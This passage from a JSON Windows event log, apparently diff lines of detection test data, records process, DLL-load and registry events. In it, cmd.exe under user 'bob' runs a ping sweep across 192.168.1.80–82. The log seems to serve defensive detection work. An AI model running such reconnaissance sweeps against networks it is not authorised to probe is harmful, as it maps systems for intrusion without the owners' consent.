131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "process", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572366840000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.80", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4764, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572366980000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "event_type": "image_load", - "image_name": "execmodelproxy.dll", - "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", - "pid": 4744, - "process_name": "explorer.exe", - "process_path": "C:\\Windows\\explorer.exe", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ploptin.dll", - "image_path": "C:\\Windows\\System32\\ploptin.dll", - "pid": 4744, - "process_name": "explorer.exe", - "process_path": "C:\\Windows\\explorer.exe", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572371830000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.81", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 556, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572371970000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371830000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371830000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "process", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572376830000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.82", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6016, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572376970000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376830000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": 